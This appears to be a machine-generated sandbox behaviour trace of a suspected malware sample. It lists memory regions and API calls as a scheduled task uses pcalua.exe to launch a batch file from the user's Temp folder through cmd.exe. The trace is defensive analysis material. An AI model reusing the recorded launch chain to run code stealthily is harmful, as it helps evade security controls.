filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1715
start_va = 0x130000
end_va = 0x130fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 1716
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1717
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 1718
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1719
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1720
start_va = 0x150000
end_va = 0x153fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 1721
start_va = 0x160000
end_va = 0x187fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 1722
start_va = 0x310000
end_va = 0x310fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000310000"
filename = ""
Region:
id = 1723
start_va = 0x2cf0000
end_va = 0x2df0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cf0000"
filename = ""
Region:
id = 1724
start_va = 0x2cf0000
end_va = 0x2df0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cf0000"
filename = ""
Region:
id = 1725
start_va = 0x2cf0000
end_va = 0x2df0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cf0000"
filename = ""
Region:
id = 1726
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1727
start_va = 0x320000
end_va = 0x37bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shell32.dll.mui"
filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui")
Region:
id = 1728
start_va = 0x150000
end_va = 0x153fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1729
start_va = 0x1cd0000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 1730
start_va = 0x380000
end_va = 0x383fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1731
start_va = 0x1e60000
end_va = 0x1ec5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1732
start_va = 0x1ef0000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ef0000"
filename = ""
Region:
id = 1733
start_va = 0x7fefdba0000
end_va = 0x7fefdd17fff
monitored = 0
entry_point = 0x7fefdba10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 1734
start_va = 0x7fefdd20000
end_va = 0x7fefde49fff
monitored = 0
entry_point = 0x7fefdd210d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 1735
start_va = 0x7feff170000
end_va = 0x7feff3c8fff
monitored = 0
entry_point = 0x7feff171340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 1736
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1737
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1738
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1739
start_va = 0x390000
end_va = 0x390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 1740
start_va = 0x2e90000
end_va = 0x2f0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e90000"
filename = ""
Region:
id = 1741
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1742
start_va = 0x2fc0000
end_va = 0x303ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002fc0000"
filename = ""
Region:
id = 1743
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1744
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1745
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1746
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1747
start_va = 0x630000
end_va = 0x63cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 1748
start_va = 0x2cf0000
end_va = 0x2d6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cf0000"
filename = ""
Region:
id = 1749
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Thread:
id = 85
os_tid = 0xc1c
[0374.260] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ff30 | out: lpSystemTimeAsFileTime=0x20ff30*(dwLowDateTime=0xf724bf40, dwHighDateTime=0x1dab598))
[0374.260] GetCurrentProcessId () returned 0xc18
[0374.260] GetCurrentThreadId () returned 0xc1c
[0374.260] GetTickCount () returned 0x1425d23
[0374.260] QueryPerformanceCounter (in: lpPerformanceCount=0x20ff38 | out: lpPerformanceCount=0x20ff38*=2125495752307) returned 1
[0374.261] GetStartupInfoW (in: lpStartupInfo=0x20fee0 | out: lpStartupInfo=0x20fee0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1dab598f724bf40, hStdOutput=0x1eee16b5673, hStdError=0x0))
[0374.261] GetModuleHandleW (lpModuleName=0x0) returned 0xffe50000
[0374.261] __set_app_type (_Type=0x2)
[0374.261] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe51798) returned 0x0
[0374.261] __wgetmainargs (in: _Argc=0xffe53120, _Argv=0xffe53130, _Env=0xffe53128, _DoWildCard=0, _StartInfo=0xffe5313c | out: _Argc=0xffe53120, _Argv=0xffe53130, _Env=0xffe53128) returned 0
[0374.263] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0374.263] RegisterClassExW (param_1=0x20fe00) returned 0xc1bf
[0374.264] CreateWindowExW (dwExStyle=0x0, lpClassName="PCALUA", lpWindowName="PCALUA", dwStyle=0xcf0000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xffe50000, lpParam=0x0) returned 0x50300
[0374.305] SetForegroundWindow (hWnd=0x50300) returned 0
[0374.411] CommandLineToArgvW (in: lpCmdLine="-a \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"", pNumArgs=0x20feb0 | out: pNumArgs=0x20feb0) returned 0x3d41a0*="-a"
[0374.411] _wcsicmp (_String1="-a", _String2="-l") returned -11
[0374.411] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", _String2="-l") returned 54
[0374.412] PcaLaunchApplicationWithConsent () returned 0x1
[0375.073] LocalFree (hMem=0x3d41a0) returned 0x0
[0375.073] exit (_Code=0)
Thread:
id = 86
os_tid = 0x4c0
Thread:
id = 87
os_tid = 0x1c4
Thread:
id = 88
os_tid = 0x504
Thread:
id = 89
os_tid = 0x82c
Process:
id = "9"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x1fbdb000"
os_pid = "0xb34"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "8"
os_parent_pid = "0xc18"
cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\" \""
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1750
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1751
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1752
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1753
start_va = 0xf0000
end_va = 0x1effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1754
start_va = 0x4a250000
end_va = 0x4a2a8fff
monitored = 1
entry_point = 0x4a2590b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 1755
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1756
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1757
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1758
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1759
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1760
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1761
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1762
start_va = 0x1f0000
end_va = 0x2fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 1763
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1764
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1765
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1766
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1767
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1768
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1769
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1770
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1771
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 1772
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1773
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1774
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1775
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1776
start_va = 0xc0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1777
start_va = 0x300000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 1778
start_va = 0x400000
end_va = 0x587fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000400000"
filename = ""
Region:
id = 1779
start_va = 0x590000
end_va = 0x5b8fff
monitored = 0
entry_point = 0x591010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1780
start_va = 0x590000
end_va = 0x5b8fff
monitored = 0
entry_point = 0x591010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1781
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1782
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1783
start_va = 0x590000
end_va = 0x710fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000590000"
filename = ""
Region:
id = 1784
start_va = 0x720000
end_va = 0x1b1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000720000"
filename = ""
Region:
id = 1785
start_va = 0x1b20000
end_va = 0x1b3ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 1786
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1787
start_va = 0xd0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1788
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1789
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1790
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1791
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1792
start_va = 0x1f0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 1793
start_va = 0x200000
end_va = 0x2fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1794
start_va = 0x1b40000
end_va = 0x1e0efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1835
start_va = 0xfff30000
end_va = 0xfff58fff
monitored = 0
entry_point = 0xfff328c4
region_type = mapped_file
name = "cscript.exe"
filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")
Region:
id = 1938
start_va = 0x1e10000
end_va = 0x1e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e10000"
filename = ""
Thread:
id = 90
os_tid = 0x43c
[0375.545] GetProcAddress (hModule=0x77660000, lpProcName="SetConsoleInputExeNameW") returned 0x77670c80
[0375.546] GetProcessHeap () returned 0x200000
[0375.546] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x21c5b0
[0375.546] GetProcessHeap () returned 0x200000
[0375.547] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c5b0 | out: hHeap=0x200000) returned 1
[0375.552] _wcsicmp (_String1="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"", _String2=")") returned -7
[0375.552] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 68
[0375.552] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 68
[0375.552] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 71
[0375.552] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 71
[0375.552] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 80
[0375.552] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 80
[0375.552] GetProcessHeap () returned 0x200000
[0375.553] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb0) returned 0x219db0
[0375.553] GetProcessHeap () returned 0x200000
[0375.553] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x76) returned 0x219e70
[0375.553] GetProcessHeap () returned 0x200000
[0375.553] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x14) returned 0x2185a0
[0375.558] GetConsoleTitleW (in: lpConsoleTitle=0x1efb70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.558] GetFileAttributesW (lpFileName="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"" (normalized: "c:\\windows\\system32\\\"c:\\users\\keecfm~1\\appdata\\local\\temp\\check01.bat\"")) returned 0xffffffff
[0375.559] _wcsicmp (_String1="\"C", _String2="DIR") returned -66
[0375.559] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67
[0375.559] _wcsicmp (_String1="\"C", _String2="DEL") returned -66
[0375.559] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82
[0375.559] _wcsicmp (_String1="\"C", _String2="COPY") returned -65
[0375.559] _wcsicmp (_String1="\"C", _String2="CD") returned -65
[0375.560] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65
[0375.560] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80
[0375.560] _wcsicmp (_String1="\"C", _String2="REN") returned -80
[0375.560] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67
[0375.560] _wcsicmp (_String1="\"C", _String2="SET") returned -81
[0375.560] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78
[0375.560] _wcsicmp (_String1="\"C", _String2="DATE") returned -66
[0375.560] _wcsicmp (_String1="\"C", _String2="TIME") returned -82
[0375.560] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78
[0375.560] _wcsicmp (_String1="\"C", _String2="MD") returned -75
[0375.560] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75
[0375.560] _wcsicmp (_String1="\"C", _String2="RD") returned -80
[0375.560] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80
[0375.560] _wcsicmp (_String1="\"C", _String2="PATH") returned -78
[0375.560] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69
[0375.561] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81
[0375.561] _wcsicmp (_String1="\"C", _String2="CLS") returned -65
[0375.561] _wcsicmp (_String1="\"C", _String2="CALL") returned -65
[0375.561] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84
[0375.561] _wcsicmp (_String1="\"C", _String2="VER") returned -84
[0375.561] _wcsicmp (_String1="\"C", _String2="VOL") returned -84
[0375.561] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67
[0375.561] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81
[0375.561] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67
[0375.561] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82
[0375.561] _wcsicmp (_String1="\"C", _String2="START") returned -81
[0375.561] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66
[0375.561] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73
[0375.561] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75
[0375.561] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78
[0375.561] _wcsicmp (_String1="\"C", _String2="POPD") returned -78
[0375.561] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63
[0375.562] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68
[0375.562] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64
[0375.562] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65
[0375.562] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75
[0375.562] _wcsicmp (_String1="\"C", _String2="DIR") returned -66
[0375.562] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67
[0375.562] _wcsicmp (_String1="\"C", _String2="DEL") returned -66
[0375.562] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82
[0375.562] _wcsicmp (_String1="\"C", _String2="COPY") returned -65
[0375.562] _wcsicmp (_String1="\"C", _String2="CD") returned -65
[0375.562] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65
[0375.562] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80
[0375.562] _wcsicmp (_String1="\"C", _String2="REN") returned -80
[0375.562] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67
[0375.562] _wcsicmp (_String1="\"C", _String2="SET") returned -81
[0375.563] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78
[0375.563] _wcsicmp (_String1="\"C", _String2="DATE") returned -66
[0375.563] _wcsicmp (_String1="\"C", _String2="TIME") returned -82
[0375.563] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78
[0375.563] _wcsicmp (_String1="\"C", _String2="MD") returned -75
[0375.563] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75
[0375.563] _wcsicmp (_String1="\"C", _String2="RD") returned -80
[0375.563] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80
[0375.563] _wcsicmp (_String1="\"C", _String2="PATH") returned -78
[0375.563] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69
[0375.563] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81
[0375.563] _wcsicmp (_String1="\"C", _String2="CLS") returned -65
[0375.563] _wcsicmp (_String1="\"C", _String2="CALL") returned -65
